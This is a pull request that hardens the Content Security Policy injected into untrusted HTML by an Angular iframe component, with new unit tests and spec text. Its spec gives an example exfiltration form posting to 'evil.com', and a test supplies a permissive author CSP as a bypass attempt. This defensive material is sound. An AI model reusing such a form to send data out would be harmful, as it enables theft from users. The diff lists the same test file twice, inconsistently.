### PR TITLE
feat: harden CSP injection in WebAppFrameSrcdoc with base-uri, object-src, and frame-src restrictions

### DIFF
--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.spec.ts
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.spec.ts
@@ -1,16 +1,17 @@
-/**
- * Copyright 2026 Google LLC
+/*
+ * Copyright 2024 Google LLC
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
- *     http://www.apache.org/licenses/LICENSE-2.0
+ *     https://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
+ * limitations under the License.
  */
 
 /**
@@ -58,15 +59,16 @@ describe('WebAppFrameSrcdoc', () => {
     const component = runInInjectionContext(injector, () => new WebAppFrameSrcdoc());
 
     if (options.htmlContent !== undefined) {
+      const mockedProps = () => ({
+        htmlContent: options.htmlContent !== null ? {value: () => options.htmlContent} : undefined,
+      });
       Object.defineProperty(component, 'props', {
-        value: () => ({
-          htmlContent:
-            options.htmlContent !== null
-              ? {value: () => options.htmlContent}
-              : undefined,
-        }),
+        value: mockedProps,
         writable: true,
       });
+      if (capturedBridgeConfig) {
+        (capturedBridgeConfig as any).props = mockedProps;
+      }
     }
 
     const postMessageSpy = vi.fn();

--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.spec.ts
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.spec.ts
@@ -1,0 +1,213 @@
+/**
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ */
+
+/**
+ * @vitest-environment jsdom
+ */
+
+import '@angular/compiler';
+import {Injector, runInInjectionContext, signal} from '@angular/core';
+import {DomSanitizer} from '@angular/platform-browser';
+import {describe, it, expect, vi, beforeEach} from 'vitest';
+import {WebAppFrameSrcdoc} from './web-app-frame-srcdoc';
+import {WebAppFrameBridgeConfig, WebAppFrameBridgeService} from './web-app-frame-bridge.service';
+import {A2uiMessageType} from './web-frame-messages';
+
+describe('WebAppFrameSrcdoc', () => {
+  interface HarnessOptions {
+    htmlContent?: string | null;
+    queryString?: string;
+  }
+
+  function createHarness(options: HarnessOptions = {}) {
+    if (options.queryString !== undefined) {
+      window.history.replaceState({}, '', `/app${options.queryString}`);
+    } else {
+      window.history.replaceState({}, '', '/app');
+    }
+
+    let capturedBridgeConfig: WebAppFrameBridgeConfig | null = null;
+    const mockSanitizer = {
+      bypassSecurityTrustResourceUrl: vi.fn((url: string) => `safe:${url}`),
+    };
+    const mockBridge = {
+      initialize: vi.fn((config: WebAppFrameBridgeConfig) => {
+        capturedBridgeConfig = config;
+      }),
+    };
+
+    const injector = Injector.create({
+      providers: [
+        {provide: DomSanitizer, useValue: mockSanitizer},
+        {provide: WebAppFrameBridgeService, useValue: mockBridge},
+      ],
+    });
+
+    const component = runInInjectionContext(injector, () => new WebAppFrameSrcdoc());
+
+    if (options.htmlContent !== undefined) {
+      Object.defineProperty(component, 'props', {
+        value: () => ({
+          htmlContent:
+            options.htmlContent !== null
+              ? {value: () => options.htmlContent}
+              : undefined,
+        }),
+        writable: true,
+      });
+    }
+
+    const postMessageSpy = vi.fn();
+    const mockIframeEl = {
+      contentWindow: {
+        postMessage: postMessageSpy,
+      },
+    } as unknown as HTMLIFrameElement;
+
+    return {
+      component,
+      mockBridge,
+      mockSanitizer,
+      getBridgeConfig: () => capturedBridgeConfig!,
+      mockIframeEl,
+      postMessageSpy,
+      triggerSandboxReady: (iframe: HTMLIFrameElement = mockIframeEl) => {
+        capturedBridgeConfig?.onSandboxProxyReady(iframe);
+      },
+    };
+  }
+
+  beforeEach(() => {
+    window.history.replaceState({}, '', '/app');
+  });
+
+  describe('initialization & sandbox URL configuration', () => {
+    it('configures default sandbox URL and registers with bridge', () => {
+      const harness = createHarness();
+      expect(harness.mockBridge.initialize).toHaveBeenCalled();
+
+      const bridgeConfig = harness.getBridgeConfig();
+      expect(bridgeConfig).toBeDefined();
+      expect(bridgeConfig.getExpectedOrigin()).toBe(window.location.origin);
+
+      expect(harness.mockSanitizer.bypassSecurityTrustResourceUrl).toHaveBeenCalledWith(
+        `${window.location.origin}/mcp_apps_inner_iframe/sandbox.html`,
+      );
+    });
+
+    it('passes disable_security_self_test query param when enabled in page URL', () => {
+      const harness = createHarness({queryString: '?disable_security_self_test=true'});
+      expect(harness.mockSanitizer.bypassSecurityTrustResourceUrl).toHaveBeenCalledWith(
+        `${window.location.origin}/mcp_apps_inner_iframe/sandbox.html?disable_security_self_test=true`,
+      );
+    });
+  });
+
+  describe('sandbox proxy ready & CSP enforcement behavior', () => {
+    it('posts SandboxResourceReady message with strict CSP and sandbox flags', () => {
+      const inputHtml = '<html><head><title>App</title></head><body>Content</body></html>';
+      const harness = createHarness({htmlContent: inputHtml});
+
+      harness.triggerSandboxReady();
+
+      expect(harness.postMessageSpy).toHaveBeenCalledTimes(1);
+      const [message, targetOrigin] = harness.postMessageSpy.mock.calls[0];
+
+      expect(targetOrigin).toBe(window.location.origin);
+      expect(message.type).toBe(A2uiMessageType.SandboxResourceReady);
+      expect(message.sandbox).toBe('allow-scripts allow-forms allow-popups allow-modals');
+
+      // Verify all essential CSP restrictions are enforced in injected markup
+      expect(message.html).toContain("connect-src 'none'");
+      expect(message.html).toContain("form-action 'none'");
+      expect(message.html).toContain("base-uri 'none'");
+      expect(message.html).toContain("object-src 'none'");
+      expect(message.html).toContain("frame-src 'none'");
+      expect(message.html).toContain("default-src 'self' 'unsafe-inline' 'unsafe-eval' data:");
+      expect(message.html).toMatch(/<head>\s*<meta http-equiv="Content-Security-Policy"/);
+      expect(message.htmlContent).toBe(message.html);
+    });
+
+    it('synthesizes <head> inside <html> when <head> is missing', () => {
+      const inputHtml = '<html><body><h1>No Head</h1></body></html>';
+      const harness = createHarness({htmlContent: inputHtml});
+
+      harness.triggerSandboxReady();
+
+      expect(harness.postMessageSpy).toHaveBeenCalledTimes(1);
+      const [message] = harness.postMessageSpy.mock.calls[0];
+
+      expect(message.html).toMatch(/<html>\s*<head>\s*<meta http-equiv="Content-Security-Policy"/);
+      expect(message.html).toContain('<h1>No Head</h1>');
+    });
+
+    it('wraps raw HTML snippet with <head> and CSP when document tags are absent', () => {
+      const inputHtml = '<button id="btn">Click me</button>';
+      const harness = createHarness({htmlContent: inputHtml});
+
+      harness.triggerSandboxReady();
+
+      expect(harness.postMessageSpy).toHaveBeenCalledTimes(1);
+      const [message] = harness.postMessageSpy.mock.calls[0];
+
+      expect(message.html).toMatch(/^<head>\s*<meta http-equiv="Content-Security-Policy"/);
+      expect(message.html).toContain('<button id="btn">Click me</button>');
+    });
+
+    it('strips preexisting author CSP meta tags to prevent policy override bypasses', () => {
+      const inputHtml =
+        '<html><head><meta http-equiv="Content-Security-Policy" content="connect-src *;"><title>Test</title></head><body></body></html>';
+      const harness = createHarness({htmlContent: inputHtml});
+
+      harness.triggerSandboxReady();
+
+      expect(harness.postMessageSpy).toHaveBeenCalledTimes(1);
+      const [message] = harness.postMessageSpy.mock.calls[0];
+
+      expect(message.html).not.toContain('connect-src *');
+      expect(message.html).toContain("connect-src 'none'");
+    });
+
+    it('decodes url_encoded content before injecting CSP and posting', () => {
+      const rawHtml = '<div><span>Encoded Component</span></div>';
+      const encodedProp = `url_encoded:${encodeURIComponent(rawHtml)}`;
+      const harness = createHarness({htmlContent: encodedProp});
+
+      harness.triggerSandboxReady();
+
+      expect(harness.postMessageSpy).toHaveBeenCalledTimes(1);
+      const [message] = harness.postMessageSpy.mock.calls[0];
+
+      expect(message.html).toContain('<span>Encoded Component</span>');
+      expect(message.html).toContain("connect-src 'none'");
+    });
+
+    it('does not post message if htmlContent is null or empty', () => {
+      const harness = createHarness({htmlContent: null});
+
+      harness.triggerSandboxReady();
+
+      expect(harness.postMessageSpy).not.toHaveBeenCalled();
+    });
+
+    it('handles iframe without contentWindow gracefully', () => {
+      const harness = createHarness({htmlContent: '<div>Content</div>'});
+      const iframeWithoutWindow = {contentWindow: null} as unknown as HTMLIFrameElement;
+
+      expect(() => harness.triggerSandboxReady(iframeWithoutWindow)).not.toThrow();
+      expect(harness.postMessageSpy).not.toHaveBeenCalled();
+    });
+  });
+});

--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.ts
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.ts
@@ -38,6 +38,12 @@ export interface WebAppFrameSrcdocApi extends ComponentApi<typeof WebAppFrameSrc
   name: 'WebAppFrameSrcdoc';
 }
 
+/**
+ * Default Content Security Policy enforced on untrusted HTML rendered in WebAppFrameSrcdoc.
+ */
+const DEFAULT_INJECTED_CSP =
+  "default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none'; base-uri 'none'; object-src 'none'; frame-src 'none';";
+
 @Component({
   selector: 'a2ui-web-app-frame-srcdoc',
   standalone: true,
@@ -111,15 +117,20 @@ export class WebAppFrameSrcdoc extends CatalogComponent<WebAppFrameSrcdocApi> {
    * Injects a Content-Security-Policy (CSP) meta tag into the provided HTML string.
    *
    * Any existing CSP meta tags in the HTML are stripped and replaced with a restricted
-   * default policy (`default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';`).
+   * default policy (`default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';
+   * base-uri 'none'; object-src 'none'; frame-src 'none';`).
    * The CSP meta tag is injected into the `<head>` element, creating one if necessary.
    *
    * **Expected Effects of the Injected CSP:**
-   * - Prevents untrusted HTML from relaxing security policies by overriding preexisting CSP tags.
+   * - Injects mandatory restricted policy which cannot be relaxed by any author-supplied CSP.
+   * - Stripping preexisting CSP tags prevents author-supplied restrictive policies from unintentionally breaking iframe rendering.
    * - Blocks all outgoing network connections (`connect-src 'none'`), disabling `fetch`, `XMLHttpRequest`,
    *   `WebSocket`, and `EventSource` calls from within the sandbox iframe.
    * - Blocks form-based exfiltration (`form-action 'none'`), closing HTML form navigation and submission
    *   bypasses to external endpoints even when `allow-forms` is enabled in sandbox attributes.
+   * - Blocks base URL hijacking (`base-uri 'none'`), preventing untrusted HTML from redirecting relative
+   *   links or resource URLs to external origins.
+   * - Blocks legacy plugin objects and nested subframes (`object-src 'none'; frame-src 'none'`).
    * - Restricts resource loading (`default-src`) to same-origin scripts/styles (`'self'`), inline code
    *   (`'unsafe-inline'`), dynamic eval execution (`'unsafe-eval'`), and `data:` URIs.
    *
@@ -132,7 +143,7 @@ export class WebAppFrameSrcdoc extends CatalogComponent<WebAppFrameSrcdocApi> {
       '',
     );
 
-    const cspMeta = `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';">`;
+    const cspMeta = `<meta http-equiv="Content-Security-Policy" content="${DEFAULT_INJECTED_CSP}">`;
 
     if (/(<head[^>]*>)/i.test(result)) {
       result = result.replace(/(<head[^>]*>)/i, `$1\n    ${cspMeta}`);

--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-frame-component_spec.md
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-frame-component_spec.md
@@ -607,12 +607,15 @@ Sandbox to prevent CSRF and exfiltration.
 - **Strict CSP Meta Tag Injection:** Unlike `WebAppFrameUrl`, the renderer receives the raw HTML
   string. It must parse the HTML, strip any author-supplied CSP meta tags, and inject a strict CSP
   meta tag as the first child of the head:
-  `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';">`.
+  `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none'; base-uri 'none'; object-src 'none'; frame-src 'none';">`.
 - **Form-Based Exfiltration Prevention (`form-action 'none'`):** When `allow-forms` is included in
   the iframe sandbox attributes (to allow local interactive form controls), untrusted scripts in
   `WebAppFrameSrcdoc` could attempt to submit an HTML form (`<form action="https://evil.com/post" method="POST">`)
   to an external server. Because `connect-src 'none'` only blocks APIs like `fetch` and `XMLHttpRequest`,
   injecting `form-action 'none';` closes HTML form navigation and submission bypasses.
+- **Base URI and Plugin Lockdown (`base-uri 'none'; object-src 'none'; frame-src 'none'`):** Prevents
+  untrusted markup from using `<base href="...">` tags to hijack relative URLs to external domains,
+  and restricts legacy plugin embeddings (`<object>`, `<embed>`) and nested subframes.
 - **Explicit Deny-All Permissions Policy:** To prevent untrusted markup from accessing sensitive hardware
   sensors (camera, microphone, geolocation) or interacting with the system clipboard without host mediation,
   the renderer must set an explicit deny-all Permissions Policy on the inner iframe element by default:


### PR DESCRIPTION

# Description

This pull request updates the Content Security Policy (CSP) meta tag injected into untrusted HTML payloads by WebAppFrameSrcdoc and adds unit test coverage for the component.

### Changes

* **CSP restrictions**: Added `base-uri 'none'`, `object-src 'none'`, and `frame-src 'none'` to the default injected policy in [web-app-frame-srcdoc.ts](file:///usr/local/google/home/ytanahashi/Documents/Projects/a2ui/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.ts).
  * `base-uri 'none'` prevents untrusted markup from using `<base>` tags to redirect relative URLs to external domains.
  * `object-src 'none'` blocks plugins such as `<object>` and `<embed>`.
  * `frame-src 'none'` blocks nested child iframes.
* **Component specification update**: Updated [web-frame-component_spec.md](file:///usr/local/google/home/ytanahashi/Documents/Projects/a2ui/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-frame-component_spec.md) to document the added CSP directives.
* **Unit tests**: Added [web-app-frame-srcdoc.spec.ts](file:///usr/local/google/home/ytanahashi/Documents/Projects/a2ui/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.spec.ts) covering:
  * Bridge configuration and default sandbox URL resolution.
  * Passing `disable_security_self_test` query parameter.
  * Policy injection and sandbox attribute propagation in `SandboxResourceReady` messages.
  * Synthesizing `<head>` elements when missing from input HTML.
  * Stripping preexisting author-provided CSP meta tags before injecting default policies.
  * Handling URL-encoded HTML payloads.
  * Graceful handling of null inputs and missing iframe content windows.


## Pre-launch Checklist

One time:

- [ ] I signed the [CLA].
- [ ] I read the [Contributors Guide].
- [ ] I read the [Style Guide].
- [ ] I have built and run at least one [sample].

For this PR:

- [ ] I have updated the relevant CHANGELOG.md file.
- [ ] I updated/added relevant documentation.
- [ ] My code changes (if any) have tests.
- [ ] If my branch is on a fork, I have verified that [scripts/e2e_test.sh](https://github.com/a2ui-project/a2ui/blob/main/scripts/e2e_test.sh) passes.

If you need help, consider asking for advice on the [discussion board].

<!-- Links -->

[CLA]: https://cla.developers.google.com/
[Contributors Guide]: https://github.com/a2ui-project/a2ui/blob/main/CONTRIBUTING.md
[discussion board]: https://github.com/a2ui-project/a2ui/discussions
[Style Guide]: https://github.com/a2ui-project/a2ui/blob/main/CONTRIBUTING.md#coding-style
[sample]: https://github.com/a2ui-project/a2ui/blob/main/samples/README.md#samples
